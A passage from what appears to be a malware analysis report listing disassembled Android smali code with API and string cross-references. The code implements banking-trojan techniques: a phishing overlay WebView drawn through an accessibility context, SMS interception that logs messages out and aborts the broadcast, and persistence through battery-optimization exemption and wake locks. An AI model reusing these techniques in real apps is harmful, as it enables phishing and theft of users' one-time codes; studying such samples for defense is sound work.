                        20invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        21move-result-object v0
                        23sget-object v1, Lcom/lib;->selfAppName:Ljava/lang/String;
                        25invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        26move-result-object v0
                        28const-string v1, ".*background.*)\" }, \"isNext\" : true }], \"once\" : true, \"debug\" : false } }"
                        30invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        31move-result-object v0
                        33invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        34move-result-object v0
                        35new-instance v1, Landroid/content/Intent;
                        37invoke-direct {v1}, Landroid/content/Intent;-><init>()V
                        39const-string v2, "android.settings.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"
                        41invoke-virtual {v1, v2}, Landroid/content/Intent;->setAction(Ljava/lang/String;)Landroid/content/Intent;
                        42const/high16 v2, 0x10000000
                        44invoke-virtual {v1, v2}, Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;
                        45new-instance v2, Ljava/lang/StringBuilder;
                        47invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        49sget-object v3, Lcom/lib;->STRINGS_PACKAGE:Ljava/lang/String;
                        51invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        52move-result-object v2
                        54sget-object v3, Lcom/lib;->STRINGS_TWO_DOTS:Ljava/lang/String;
                        56invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        57move-result-object v2
                        59invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
                        60move-result-object v3
                        62invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        63move-result-object v2
                        65invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        66move-result-object v2
                        68invoke-static {v2}, Landroid/net/Uri;->parse(Ljava/lang/String;)Landroid/net/Uri;
                        69move-result-object v2
                        71invoke-virtual {v1, v2}, Landroid/content/Intent;->setData(Landroid/net/Uri;)Landroid/content/Intent;
                        73invoke-virtual {p1, v1}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        74const-wide/16 v2, 0x4
                        76invoke-static {v2, v3}, Ljava/lang/Long;->valueOf(J)Ljava/lang/Long;
                        77move-result-object v1
                        79invoke-virtual {p0, p1, v1, v0}, Lcom/lib;->allowOptimizationsIgnored(Landroid/content/Context;Ljava/lang/Long;Ljava/lang/String;)Z
                        80goto_6c: return-void
                        81cond_6d:
                        82invoke-virtual {p0, p1}, Lcom/lib;->setWakeLocks(Landroid/content/Context;)V
                        83goto/16 :goto_6c
                        Cross References
                        APIs
                        • android.content.Context.getSystemService
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.os.PowerManager.newWakeLock
                        • android.os.PowerManager$WakeLock.acquire
                        • android.content.Context.getApplicationContext
                        • android.content.Context.getSystemService
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.net.wifi.WifiManager.createWifiLock
                        • android.net.wifi.WifiManager$WifiLock.isHeld
                        • android.net.wifi.WifiManager$WifiLock.acquire
                        • android.os.PowerManager$WakeLock.isHeld
                        • android.os.PowerManager$WakeLock.acquire
                        Strings
                        • power
                        • wifi
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2sget-object v0, Lcom/lib;->wakeLock:Landroid/os/PowerManager$WakeLock;
                        3if-nez v0, :cond_87
                        5const-string v0, "power"
                        7invoke-virtual {p1, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        8move-result-object v0
                        9check-cast v0, Landroid/os/PowerManager;
                        10if-eqz v0, :cond_3d
                        11const/4 v1, 0x1
                        12new-instance v2, Ljava/lang/StringBuilder;
                        14invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        15const/16 v3, 0x10
                        17invoke-static {v3}, Lcom/lib;->randStr(I)Ljava/lang/String;
                        18move-result-object v3
                        20invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        21move-result-object v2
                        23sget-object v3, Lcom/lib;->STRINGS_TWO_DOTS:Ljava/lang/String;
                        25invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        26move-result-object v2
                        27const/16 v3, 0x10
                        29invoke-static {v3}, Lcom/lib;->randStr(I)Ljava/lang/String;
                        30move-result-object v3
                        32invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        33move-result-object v2
                        35invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        36move-result-object v2
                        38invoke-virtual {v0, v1, v2}, Landroid/os/PowerManager;->newWakeLock(ILjava/lang/String;)Landroid/os/PowerManager$WakeLock;
                        39move-result-object v0
                        40sput-object v0, Lcom/lib;->wakeLock:Landroid/os/PowerManager$WakeLock;
                        42sget-object v0, Lcom/lib;->wakeLock:Landroid/os/PowerManager$WakeLock;
                        44invoke-virtual {v0}, Landroid/os/PowerManager$WakeLock;->acquire()V
                        45goto_3d:
                        46sget-object v0, Lcom/lib;->wifiLock:Landroid/net/wifi/WifiManager$WifiLock;
                        47if-nez v0, :cond_79
                        49invoke-virtual {p1}, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
                        50move-result-object v0
                        52const-string v1, "wifi"
                        54invoke-virtual {v0, v1}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        55move-result-object v0
                        56check-cast v0, Landroid/net/wifi/WifiManager;
                        57if-eqz v0, :cond_79
                        58const/4 v1, 0x3
                        59new-instance v2, Ljava/lang/StringBuilder;
                        61invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        62const/16 v3, 0x10
                        64invoke-static {v3}, Lcom/lib;->randStr(I)Ljava/lang/String;
                        65move-result-object v3
                        67invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        68move-result-object v2
                        70sget-object v3, Lcom/lib;->STRINGS_TWO_DOTS:Ljava/lang/String;
                        72invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        73move-result-object v2
                        74const/16 v3, 0x10
                        76invoke-static {v3}, Lcom/lib;->randStr(I)Ljava/lang/String;
                        77move-result-object v3
                        79invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        80move-result-object v2
                        82invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        83move-result-object v2
                        85invoke-virtual {v0, v1, v2}, Landroid/net/wifi/WifiManager;->createWifiLock(ILjava/lang/String;)Landroid/net/wifi/WifiManager$WifiLock;
                        86move-result-object v0
                        87sput-object v0, Lcom/lib;->wifiLock:Landroid/net/wifi/WifiManager$WifiLock;
                        88cond_79:
                        89sget-object v0, Lcom/lib;->wifiLock:Landroid/net/wifi/WifiManager$WifiLock;
                        91invoke-virtual {v0}, Landroid/net/wifi/WifiManager$WifiLock;->isHeld()Z
                        92move-result v0
                        93if-nez v0, :cond_86
                        95sget-object v0, Lcom/lib;->wifiLock:Landroid/net/wifi/WifiManager$WifiLock;
                        97invoke-virtual {v0}, Landroid/net/wifi/WifiManager$WifiLock;->acquire()V
                        98goto_86: return-void
                        99cond_87:
                        100sget-object v0, Lcom/lib;->wakeLock:Landroid/os/PowerManager$WakeLock;
                        102invoke-virtual {v0}, Landroid/os/PowerManager$WakeLock;->isHeld()Z
                        103move-result v0
                        104if-nez v0, :cond_3d
                        106sget-object v0, Lcom/lib;->wakeLock:Landroid/os/PowerManager$WakeLock;
                        108invoke-virtual {v0}, Landroid/os/PowerManager$WakeLock;->acquire()V
                        109try_end_94: goto/16 :goto_3d
                        110catch_95: move-exception v0
                        111goto/16 :goto_86
                        APIs
                        • android.view.WindowManager$LayoutParams.<init>
                        • android.content.Context.getSystemService
                        • android.webkit.WebView.<init>
                        • android.webkit.WebView.getSettings
                        • android.webkit.WebSettings.setJavaScriptEnabled
                        • android.webkit.WebView.getSettings
                        • android.webkit.WebSettings.setJavaScriptCanOpenWindowsAutomatically
                        • android.webkit.WebView.setBackgroundColor
                        • android.app.WallpaperManager.getInstance
                        • android.app.WallpaperManager.getDrawable
                        • android.webkit.WebView.setBackground
                        • android.content.Context.getResources
                        • java.lang.Integer.intValue
                        • android.content.res.Resources.getString
                        • android.webkit.WebView.loadData
                        • android.webkit.WebView.setFitsSystemWindows
                        • android.webkit.WebView.setSystemUiVisibility
                        • android.view.WindowManager.addView
                        Strings
                        • window
                        • text/html
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x1
                        2const/4 v2, 0x0
                        3const/16 v0, 0x588
                        4new-instance v3, Landroid/view/WindowManager$LayoutParams;
                        5const/16 v4, 0x7f0
                        6const/4 v5, -0x3
                        8invoke-direct {v3, v4, v0, v5}, Landroid/view/WindowManager$LayoutParams;-><init>(III)V
                        9const/16 v0, 0x35
                        10iput v0, v3, Landroid/view/WindowManager$LayoutParams;->gravity:I
                        12sget-object v0, Lcom/lib;->a11yContext:Landroid/content/Context;
                        14const-string v4, "window"
                        16invoke-virtual {v0, v4}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        17move-result-object v0
                        18check-cast v0, Landroid/view/WindowManager;
                        19if-eqz v0, :cond_76
                        20new-instance v4, Landroid/webkit/WebView;
                        22sget-object v5, Lcom/lib;->a11yContext:Landroid/content/Context;
                        24invoke-direct {v4, v5}, Landroid/webkit/WebView;-><init>(Landroid/content/Context;)V
                        25sput-object v4, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        27sget-object v4, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        29invoke-virtual {v4}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
                        30move-result-object v4
                        32invoke-virtual {v4, v1}, Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V
                        34sget-object v4, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        36invoke-virtual {v4}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
                        37move-result-object v4
                        39invoke-virtual {v4, v1}, Landroid/webkit/WebSettings;->setJavaScriptCanOpenWindowsAutomatically(Z)V
                        41sget-object v4, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        43invoke-virtual {v4, v2}, Landroid/webkit/WebView;->setBackgroundColor(I)V
                        45sget-object v4, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        47sget-object v5, Lcom/lib;->a11yContext:Landroid/content/Context;
                        49invoke-static {v5}, Landroid/app/WallpaperManager;->getInstance(Landroid/content/Context;)Landroid/app/WallpaperManager;
                        50move-result-object v5
                        52invoke-virtual {v5}, Landroid/app/WallpaperManager;->getDrawable()Landroid/graphics/drawable/Drawable;
                        53move-result-object v5
                        55invoke-virtual {v4, v5}, Landroid/webkit/WebView;->setBackground(Landroid/graphics/drawable/Drawable;)V
                        57sget-object v4, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        59sget-object v5, Lcom/lib;->a11yContext:Landroid/content/Context;
                        61invoke-virtual {v5}, Landroid/content/Context;->getResources()Landroid/content/res/Resources;
                        62move-result-object v5
                        64sget-object v6, Lcom/lib;->banner_text:Ljava/lang/Integer;
                        66invoke-virtual {v6}, Ljava/lang/Integer;->intValue()I
                        67move-result v6
                        69invoke-virtual {v5, v6}, Landroid/content/res/Resources;->getString(I)Ljava/lang/String;
                        70move-result-object v5
                        72const-string v6, "text/html"
                        73const/4 v7, 0x0
                        75invoke-virtual {v4, v5, v6, v7}, Landroid/webkit/WebView;->loadData(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
                        77sget-object v4, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        79invoke-virtual {v4, v2}, Landroid/webkit/WebView;->setFitsSystemWindows(Z)V
                        81sget-object v2, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        82const/16 v4, 0xc06
                        84invoke-virtual {v2, v4}, Landroid/webkit/WebView;->setSystemUiVisibility(I)V
                        86sget-object v2, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        88invoke-interface {v0, v2, v3}, Landroid/view/WindowManager;->addView(Landroid/view/View;Landroid/view/ViewGroup$LayoutParams;)V
                        89move v0, v1
                        90goto_75: return v0
                        91cond_76: move v0, v2
                        92goto/16 :goto_75
                        Cross References
                        APIs
                        • android.content.Intent.getAction
                        • java.lang.String.equals
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • org.json.JSONObject.length
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.length
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • org.json.JSONObject.toString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.toString
                        • android.content.BroadcastReceiver.abortBroadcast
                        Strings
                        • android.provider.Telephony.SMS_RECEIVED
                        • [func] [doSMS] sms.length():
                        • [func] [doSMS] sms:
                        • smsLog
                        Position Instruction Meta Information
                        0.prologue
                        2invoke-virtual {p0, p1}, Lcom/lib;->isSmsAdmin(Landroid/content/Context;)Z
                        3move-result v0
                        4if-eqz v0, :cond_5d
                        6invoke-virtual {p3}, Landroid/content/Intent;->getAction()Ljava/lang/String;
                        7move-result-object v0
                        9const-string v1, "android.provider.Telephony.SMS_RECEIVED"
                        11invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        12move-result v0
                        13if-eqz v0, :cond_5d
                        15invoke-virtual {p0, p1, p3}, Lcom/lib;->parseSMS(Landroid/content/Context;Landroid/content/Intent;)Lorg/json/JSONObject;
                        16move-result-object v0
                        17new-instance v1, Ljava/lang/StringBuilder;
                        19invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        21const-string v2, "[func] [doSMS] sms.length(): "
                        23invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        24move-result-object v1
                        26invoke-virtual {v0}, Lorg/json/JSONObject;->length()I
                        27move-result v2
                        29invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        30move-result-object v1
                        32invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        33move-result-object v1
                        35invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        37invoke-virtual {v0}, Lorg/json/JSONObject;->length()I
                        38move-result v1
                        39const/4 v2, 0x3
                        40if-ne v1, v2, :cond_5a
                        41new-instance v1, Ljava/lang/StringBuilder;
                        43invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        45const-string v2, "[func] [doSMS] sms: "
                        47invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        48move-result-object v1
                        50invoke-virtual {v0}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        51move-result-object v2
                        53invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        54move-result-object v1
                        56invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        57move-result-object v1
                        59invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        61const-string v1, "smsLog"
                        63invoke-virtual {v0}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        64move-result-object v0
                        66invoke-virtual {p0, p1, v1, v0}, Lcom/lib;->sendLog(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Z
                        67cond_5a:
                        68invoke-virtual {p2}, Landroid/content/BroadcastReceiver;->abortBroadcast()V
                        69cond_5d: return-void
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.getBoolean
                        • java.util.concurrent.Semaphore.release
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.release
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • [func] [isNeedASniff] T:
                        • [func] [isNeedASniff] InterruptedException:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        10const/4 v2, 0x0
                        12invoke-interface {v1, p3, v2}, Landroid/content/SharedPreferences;->getBoolean(Ljava/lang/String;Z)Z
                        13try_end_f: move-result v0
                        14try_start_10:
                        15sget-object v1, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        17invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        18try_end_15: return v0
                        19catch_16: move-exception v1
                        20try_start_17: new-instance v2, Ljava/lang/StringBuilder;
                        22invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        24const-string v3, "[func] [isNeedASniff] T: "
                        26invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        27move-result-object v2
                        29invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        30move-result-object v1
                        32invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        33move-result-object v1
                        35invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        36try_start_2d:
                        37sget-object v1, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        39invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        40try_end_32: goto/16 :goto_15
                        41catch_33: move-exception v1
                        42new-instance v2, Ljava/lang/StringBuilder;
                        44invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        46const-string v3, "[func] [isNeedASniff] InterruptedException: "
                        48invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        49move-result-object v2
                        51invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        52move-result-object v1
                        54invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        55move-result-object v1
                        57invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        58goto/16 :goto_15
                        59catchall_4b: move-exception v1
                        60try_start_4c:
                        61sget-object v2, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        63invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        64throw v1
                        Cross References
                        APIs
                        • java.lang.Class.getClassLoader
                        • java.lang.Class.forName
                        • java.lang.Class.getDeclaredMethod
                        • java.lang.reflect.Method.invoke
                        • java.lang.RuntimeException.<init>
                        • java.lang.RuntimeException.<init>
                        • java.lang.reflect.InvocationTargetException.getCause
                        • java.lang.reflect.InvocationTargetException.getCause
                        • java.lang.RuntimeException.<init>
                        • java.lang.RuntimeException.<init>
                        Strings
                        • read
                        • VersionedParcel encountered ClassNotFoundException
                        • VersionedParcel encountered NoSuchMethodException
                        • VersionedParcel encountered InvocationTargetException
                        • VersionedParcel encountered IllegalAccessException
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T::",
                        3"Landroidx/versionedparcelable/VersionedParcelable;",
                        4">(",
                        5"Ljava/lang/String;",
                        6"Landroidx/versionedparcelable/VersionedParcel;",
                        7")TT;"
                        8}
                        9.end annotation
                        10const-class v0, Landroidx/versionedparcelable/VersionedParcel;
                        11try_start_2:
                        12invoke-virtual {v0}, Ljava/lang/Class;->getClassLoader()Ljava/lang/ClassLoader;
                        13move-result-object v1
                        14const/4 v2, 0x1
                        16invoke-static {p0, v2, v1}, Ljava/lang/Class;->forName(Ljava/lang/String;ZLjava/lang/ClassLoader;)Ljava/lang/Class;
                        17move-result-object p0
                        19const-string v1, "read"
                        20new-array v3, v2, [Ljava/lang/Class;
                        21const/4 v4, 0x0
                        22aput-object v0, v3, v4
                        24invoke-virtual {p0, v1, v3}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        25move-result-object p0
                        26const/4 v0, 0x0
                        27new-array v1, v2, [Ljava/lang/Object;
                        28aput-object p1, v1, v4
                        30invoke-virtual {p0, v0, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        31move-result-object p0
                        32check-cast p0, Landroidx/versionedparcelable/VersionedParcelable;
                        33try_end_21: return-object p0
                        34catch_22: move-exception p0
                        35goto/16 :goto_2a
                        36catch_24: move-exception p0
                        37goto/16 :goto_32
                        38catch_26: move-exception p0
                        39goto/16 :goto_3a
                        40catch_28: move-exception p0
                        41goto/16 :goto_51
                        42goto_2a: new-instance p1, Ljava/lang/RuntimeException;
                        44const-string v0, "VersionedParcel encountered ClassNotFoundException"
                        46invoke-direct {p1, v0, p0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        47throw p1
                        48goto_32: new-instance p1, Ljava/lang/RuntimeException;
                        50const-string v0, "VersionedParcel encountered NoSuchMethodException"
                        52invoke-direct {p1, v0, p0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        53throw p1
                        54goto_3a:
                        55invoke-virtual {p0}, Ljava/lang/reflect/InvocationTargetException;->getCause()Ljava/lang/Throwable;
                        56move-result-object p1
                        57instance-of p1, p1, Ljava/lang/RuntimeException;
                        58if-eqz p1, :cond_49
                        60invoke-virtual {p0}, Ljava/lang/reflect/InvocationTargetException;->getCause()Ljava/lang/Throwable;
                        61move-result-object p0
                        62check-cast p0, Ljava/lang/RuntimeException;
                        63throw p0
                        64cond_49: new-instance p1, Ljava/lang/RuntimeException;
                        66const-string v0, "VersionedParcel encountered InvocationTargetException"
                        68invoke-direct {p1, v0, p0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        69throw p1
                        70goto_51: new-instance p1, Ljava/lang/RuntimeException;
                        72const-string v0, "VersionedParcel encountered IllegalAccessException"
                        74invoke-direct {p1, v0, p0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        75throw p1
                        Cross References
                        APIs
                        • java.lang.Object.getClass
                        • java.lang.Class.getDeclaredMethod
                        • java.lang.reflect.Method.invoke
                        • java.lang.RuntimeException.<init>
                        • java.lang.RuntimeException.<init>
                        • java.lang.reflect.InvocationTargetException.getCause
                        • java.lang.reflect.InvocationTargetException.getCause
                        • java.lang.RuntimeException.<init>
                        • java.lang.RuntimeException.<init>
                        Strings
                        • write
                        • VersionedParcel encountered ClassNotFoundException
                        • VersionedParcel encountered NoSuchMethodException
                        • VersionedParcel encountered InvocationTargetException
                        • VersionedParcel encountered IllegalAccessException
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T::",
                        3"Landroidx/versionedparcelable/VersionedParcelable;",
                        4">(TT;",
                        5"Landroidx/versionedparcelable/VersionedParcel;",
                        6")V"
                        7}
                        8.end annotation
                        9try_start_0:
                        10invoke-static {p0}, Landroidx/versionedparcelable/VersionedParcel;->findParcelClass(Landroidx/versionedparcelable/VersionedParcelable;)Ljava/lang/Class;
                        11move-result-object v0
                        13const-string v1, "write"
                        14const/4 v2, 0x2
                        15new-array v3, v2, [Ljava/lang/Class;
                        17invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        18move-result-object v4
                        19const/4 v5, 0x0
                        20aput-object v4, v3, v5
                        21const-class v4, Landroidx/versionedparcelable/VersionedParcel;
                        22const/4 v6, 0x1
                        23aput-object v4, v3, v6
                        25invoke-virtual {v0, v1, v3}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        26move-result-object v0
                        27const/4 v1, 0x0
                        28new-array v2, v2, [Ljava/lang/Object;
                        29aput-object p0, v2, v5
                        30aput-object p1, v2, v6
                        32invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        33try_end_23: return-void
                        34catch_24: move-exception p0
                        35new-instance p1, Ljava/lang/RuntimeException;
                        37const-string v0, "VersionedParcel encountered ClassNotFoundException"
                        39invoke-direct {p1, v0, p0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        40throw p1
                        41catch_2d: move-exception p0
                        42new-instance p1, Ljava/lang/RuntimeException;
                        44const-string v0, "VersionedParcel encountered NoSuchMethodException"
                        46invoke-direct {p1, v0, p0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        47throw p1
                        48catch_36: move-exception p0
                        50invoke-virtual {p0}, Ljava/lang/reflect/InvocationTargetException;->getCause()Ljava/lang/Throwable;
                        51move-result-object p1
                        52instance-of p1, p1, Ljava/lang/RuntimeException;
                        53if-eqz p1, :cond_46
                        55invoke-virtual {p0}, Ljava/lang/reflect/InvocationTargetException;->getCause()Ljava/lang/Throwable;
                        56move-result-object p0
                        57check-cast p0, Ljava/lang/RuntimeException;
                        58throw p0
                        59cond_46: new-instance p1, Ljava/lang/RuntimeException;
                        61const-string v0, "VersionedParcel encountered InvocationTargetException"
                        63invoke-direct {p1, v0, p0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        64throw p1
                        65catch_4e: move-exception p0
                        66new-instance p1, Ljava/lang/RuntimeException;
                        68const-string v0, "VersionedParcel encountered IllegalAccessException"
                        70invoke-direct {p1, v0, p0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        71throw p1
                        Cross References
                        APIs
                        • android.view.WindowManager$LayoutParams.<init>
                        • android.content.Context.getSystemService
                        • android.util.DisplayMetrics.<init>
                        • android.view.WindowManager.getDefaultDisplay
                        • android.view.Display.getMetrics
                        • android.webkit.WebView.setSystemUiVisibility
                        • android.webkit.WebView.setSystemUiVisibility
                        • android.graphics.Color.parseColor
                        • android.webkit.WebView.setBackgroundColor
                        • android.view.WindowManager.addView
                        Strings
                        • window
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2if-nez p1, :cond_4
                        3goto_3: return v1
                        4cond_4: sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
                        5const/16 v2, 0x17
                        6if-lt v0, v2, :cond_5a
                        7const/16 v0, 0x7f0
                        8goto_c: const v2, 0xc040798
                        9new-instance v3, Landroid/view/WindowManager$LayoutParams;
                        10const/4 v4, -0x3
                        12invoke-direct {v3, v0, v2, v4}, Landroid/view/WindowManager$LayoutParams;-><init>(III)V
                        13const/16 v0, 0x55
                        14iput v0, v3, Landroid/view/WindowManager$LayoutParams;->gravity:I
                        15iput v1, v3, Landroid/view/WindowManager$LayoutParams;->y:I
                        17const-string v0, "window"
                        19invoke-virtual {p0, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        20move-result-object v0
                        21check-cast v0, Landroid/view/WindowManager;
                        22if-eqz v0, :cond_5d
                        23new-instance v1, Landroid/util/DisplayMetrics;
                        25invoke-direct {v1}, Landroid/util/DisplayMetrics;-><init>()V
                        27invoke-interface {v0}, Landroid/view/WindowManager;->getDefaultDisplay()Landroid/view/Display;
                        28move-result-object v2
                        30invoke-virtual {v2, v1}, Landroid/view/Display;->getMetrics(Landroid/util/DisplayMetrics;)V
                        31iget v2, v1, Landroid/util/DisplayMetrics;->heightPixels:I
                        32mul-int/lit8 v2, v2, -0x1
                        33iget v1, v1, Landroid/util/DisplayMetrics;->heightPixels:I
                        34int-to-float v1, v1
                        35float-to-double v4, v1
                        36const-wide v6, 0x40030a3d70a3d70aL # 2.38
                        37div-double/2addr v4, v6
                        38double-to-int v1, v4
                        39add-int/2addr v1, v2
                        40iput v1, v3, Landroid/view/WindowManager$LayoutParams;->y:I
                        41const/16 v1, 0x802
                        43invoke-virtual {p1, v1}, Landroid/webkit/WebView;->setSystemUiVisibility(I)V
                        44const/16 v1, 0x1706
